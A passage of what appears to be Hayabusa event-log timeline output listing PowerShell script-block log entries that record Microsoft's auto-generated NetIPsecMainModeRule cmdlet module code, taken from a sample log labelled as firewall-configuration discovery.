@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeRule ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociat",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"edNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 